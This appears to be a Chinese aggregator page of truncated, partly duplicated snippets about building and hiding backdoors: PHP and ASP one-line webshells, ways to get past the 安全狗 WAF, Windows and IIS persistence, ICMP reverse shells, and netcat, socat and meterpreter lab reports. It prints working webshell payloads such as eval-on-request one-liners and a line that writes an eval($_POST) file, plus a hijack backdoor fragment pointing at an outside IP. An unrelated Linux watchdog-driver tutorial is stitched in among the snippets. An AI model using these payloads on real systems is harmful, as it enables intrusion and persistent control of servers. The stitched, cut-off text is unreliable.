第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被…

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被…

写在前面:过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面.但是我只能说,我所传达给大家的信息,是我目前所掌握或者了解的,不能保证所有人都会有收获,但是个人水平有限,可能您觉得文章水平过低,或者并无太大营养.但是跳出文章本身,无论何种技术,重在交流,分享与总结.另外,希望年轻人不要有太多戾气,更多的是需要保持一个谦逊态度对待技术,尤其是这个浮躁的安全界.以上是我的开场白(没办法,这是我的一贯风格)写php后门连载的目的.希望大家能够暂缓…

写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面. 但是我只能说,我所传达给大家的信息,是我目前所掌握或者了解的,不能保证所有人都会有收获,但是个人水平有限,可能您觉得文章水平过低,或者并无太大营养.但是跳出文章本身,无论何种技术,重在交流,分享与总结. 另外,希望年轻人不要有太多戾气,更多的是需要保持一个谦逊态度对待技术,尤其是这个浮躁的安全界. 以上是我的开场白(没办法,这是我的一贯风格) 写php后门连载的目的. 希望…

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令. 当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理. 本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二 环境: 域名与服务器均为个人真实所有. 服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别. 对比环境: 服务器:a…

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令. 当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理. 本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二 环境: 域名与服务器均为个人真实所有. 服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别. 对比环境: 服务器:a…

<?php /********************** 作者 Spider 网上公布的各种PHP后门全军覆没 针对一些特殊变形的后门需要自己添加特征 误报率不到百分之一 **********************/ error_reporting(E_ERROR); ini_set('max_execution_time',20000); ini_set('memory_limit','512M'); header("content-Type: text/html; charset=…

作者:Phithon 原文连接:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 最近很多人分享一些过狗过盾的一句话,但无非是用各种方法去构造一些动态函数,比如$_GET['func']($_REQUEST['pass'])之类的方法.万变不离其宗,但这种方法,虽然狗盾可能看不出来,但人肉眼其实很容易发现这类后门的. 那么,我就分享一下,一些不需要动态函数.不用eval.不含敏感函数.免杀免拦截的一句话. 0x00…

ASP一句话木马收集: <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Request(chr(35)))%> <%dy=request(&q…

本文转载自:http://blog.chinaunix.net/uid-25014876-id-112879.html linux设备驱动归纳总结(十一):写个简单的看门狗驱动 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 设备驱动的归纳已经差不多了,趁着知识点还没有遗忘,写点代码巩固一下,来个简单的看门狗驱动——静态平台类的杂设备看门狗驱动,有定时和重启两个基本功能.…

fputs(fopen('a.php','w'),'<?php eval($_POST[cc])?>'); php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码. 事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马.老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的.这个着实让人蛋疼. 后来,终于在日志中发现一丝蛛丝马迹,通过我的分析,我发现一个IP总是很奇怪的POST数据到某个文…

0x00 前言 未知攻焉知防,攻击者在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者如入无人之境.这里整理一些window服务端常见的后门技术,了解攻击者的常见后门技术,有助于更好去发现服务器安全问题. 常见的后门技术列表: 1.隐藏.克隆账户 2.shift后门 3.启动项.计划任务 4.劫持技术 5.Powershell后门 6.远控软件 7.嗅探技术 0x01 隐藏.克隆账号 window 隐藏系统用户制作: 1.CMD命令行下,建立了一个用户名为“t…

搜索的时候无意中看见的这款基于ping的ICMP后门.于是到作者的github上看看,居然是阴文的,为了过级,只能强忍着看了,学生狗伤不起.还好比较简单易懂,正如简介说的一样:“PRISM is an user space stealth reverse shell backdoor, written in pure C.” 项目地址:https://github.com/andreafabrizi/prism PRISM只有两个主文件,配置简单,能在Linux.Solaris.AIX.BSD/…

看到Freebuf 小编发表的用这个隐藏于PHP模块中的rootkit,就能持久接管服务器文章,很感兴趣,苦无作者没留下PoC,自己研究一番,有了此文 0×00. 引言 PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现.由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个Backdoor. 本文就简单介下如何一步步编写一个简单的php 动态扩展后门. 0×01. p…

说起php后门***我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小***这样结果大家知道的我就不说了下面我来给大家收集了各种php后门***做法大家可参考. php后门***对大家来说一点都不陌生吧但是它的种类您又知多少呢本文为您浅析说明一些php后门***常用的函数. php后门***常用的函数大致上可分为四种类型 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, ass…

linux设备驱动归纳总结(十一):写个简单的看门狗驱动 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 设备驱动的归纳已经差不多了,趁着知识点还没有遗忘,写点代码巩固一下,来个简单的看门狗驱动--静态平台类的杂设备看门狗驱动,有定时和重启两个基本功能. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx…

APT是指高级持续性威胁, 利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式,APT攻击的原理相对于其他攻击形式更为高级和先进,其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集. 高级持续渗透后门是指高级持续性后渗透权限长期把控,利用先进的后渗透手段对特定目标进行长期持续性维持权限的后攻击形式,高级持续渗透后门的原理相对于其他后门形式更为高级和先进,其高级性主要体现在持续渗透后门在发动持续性权限维持之前需要对攻击对象的业务流程和目标系统进行精确的…

参考文章:https://blog.csdn.net/qq_38484285/article/details/101381883 感谢大佬分享!! SSRF漏洞学习终于告一段落,很早就知道phpstudy爆出来有后门,爆出漏洞的过程好像还挺奇葩的,时间也不算很充裕,今天简单学习下. 影响版本 目前已知受影响的phpStudy版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 后门位置phpStudy…

记录一下文件上传的常见姿势,更全面的可以做upload-labs. 实验环境:win2003 phpstudy 实验平台:upfile 一.准备上传的一句话木马 eval函数将接受的字符串当做代码执行 二.实验步骤 2.1 无防护上传 可以直接上传一句话木马文件 可以看到已经成功上传,并返回了相关信息. 可以使用菜刀连接 实际上权限已经有很多,但是也可以用一句话木马上传大马进行其他操作. 2.2 前台脚本检测扩展名 这里增加在前端增加了限制,如果直接上传php文件会被拒绝 可以先把文件改成允许上…

起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit();error_reporting(); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|y…

windows下的iis5/iis6做后门,隐藏访问,不留访问记录或者不留日志 好不容易攻下一台Windows2000/2003 IIS服务器,你一定会想,怎样才能长期占有这个“肉鸡”呢?聪明的你肯定会想到留后门这个法子.对Windows系列下的Web服务器来说,笔者觉得最好的后门莫过于通过80端口安置后门,因为既然要对外提供Web服务,管理员总不会把80端口给屏蔽了吧.下面让我们来看看怎么设置IIS后门.     一 GUI方式设置     如果你能通过GUI(图形界面)方式管理肉鸡的话(通过…

文章转自:http://drops.wooyun.org/tips/4342 注:译文未获得平底锅授权,纯属学习性质翻译 原文:https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-cool-reaper.pdf 综述 宇龙酷派是中国第三大以及全球第六大智能手机生产厂商.近期我们研究发现很多高端酷派手机在预装软件均包括一个后门程序,我们将此…

 从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原.但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉.本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门. 1.放大镜后门 放大镜(magnify.exe)是Windows 2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的.在用户登录系统前可以通过"Win+U"组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制…

20165221 <网络对抗技术>EXP2:后门原理与实践 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) 具体实验…

ref:https://xz.aliyun.com/t/1098/ 这里所说的core_pattern 指的是:/proc/sys/kernel/core_pattern. 我们知道在Linux系统中,如果进程崩溃了,系统内核会捕获到进程崩溃信息,然后将进程的coredump 信息写入到文件中,这个文件名默认是core,但是也可以通过配置修改这个文件名.比如可以通过修改/proc/sys/kernel/core_pattern 文件的内容来指定. Linux man 手册上关于core_patt…

一.基础问题回答: (1)例举你能想到的一个后门进入到你系统中的可能方式? 钓鱼网站:搞一个假网站,假淘宝,盗版电影,文库下载文档什么的,下载东西的时候把带隐藏的后门程序附带下载进去,自启动,反弹连接. 搞一个小网站,用iframe标签跳转到危险网页,自动下载程序. (2)例举你知道的后门如何启动起来(win及linux)的方式? 修改注册表,开机的时候自启动 利用操作系统漏洞,修改系统文件,利用系统自启动进行启动 (3)Meterpreter有哪些给你映像深刻的功能? 1.getuid指令 可…

目录 实验内容 基础问题回答 常用后门工具 Netcat windows 获取 linux 的shell linux 获取 winsdows 的shell 使用nc传输数据 使用nc传文件 Socat MSFmeterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任…

20165306 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载的软件有后…

NetSec2019 20165327 Exp2 后门原理与实践 快速找到重点: (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) (5)…

实践基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 应用程序设定后门,用户安装后,后门就可以进入.例如课堂上讲到的百度. (2)例举你知道的后门如何启动起来(win及linux)的方式? win中的后门伴随软件启动 linux可以用corn启动 (3)Meterpreter有哪些给你映像深刻的功能? 可以获取他人的语音录音和视屏,还可以获取他人操作系统权限. (4)如何发现自己有系统有没有被安装后门? 杀毒软件查杀. 试验过程 课堂上试验: 实践过程: (1)查看win7和…